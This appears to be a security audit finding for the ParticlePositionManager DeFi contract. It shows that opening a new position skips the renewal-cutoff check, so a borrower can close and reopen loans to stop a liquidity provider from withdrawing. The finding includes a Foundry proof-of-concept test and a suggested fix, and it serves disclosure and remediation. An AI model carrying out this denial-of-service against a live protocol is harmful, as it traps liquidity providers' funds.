When a liquidity provider wants to withdraw their liquidity they can call ParticlePositionManager::reclaimLiquidity. This will prevent any renewals:
ParticlePositionManager::addPremium:
File: protocol/ParticlePositionManager.sol
508: // check LP allows extension of this lien
509: if (lps.getRenewalCutoffTime(lien.tokenId) > lien.startTime) revert Errors.RenewalDisabled();
getRenewalCutoffTime is however never checked when opening a new position.
Hence a borrower can instead of renewing by adding premium simply close their position and open a new one. Since this opens a new loan with a new lien.startTime thereβs nothing the liquidity provider can do to prevent this.
A borrower can prevent a liquidity provider from withdrawing their liquidity by closing and opening a new position.
PoC test, can be added to ClosePosition.t.sol:
function testStopWithdrawLiquidity() public {
_openLongPosition();
// LP decides to withdraw their liquidity
vm.prank(LP);
particlePositionManager.reclaimLiquidity(_tokenId);
vm.warp(block.timestamp + LOAN_TERM - 1);
// borrower doesn't want that and can continue borrowing liquidity
// by closing then opening a new position against same LP position
_closeLongPosition(0, true, true);
_openLongPosition();
// 1 second after loan term
vm.warp(block.timestamp + 2);
// LP cannot claim all of their liquidity
vm.prank(LP);
vm.expectRevert();
particlePositionManager.decreaseLiquidity(_tokenId, _liquidity);
}
Manual audit
Consider blocking openPosition if renewalCutoffTime is set to allow a liquidity provider to completely withdraw.
DoS
The text was updated successfully, but these errors were encountered:
All reactions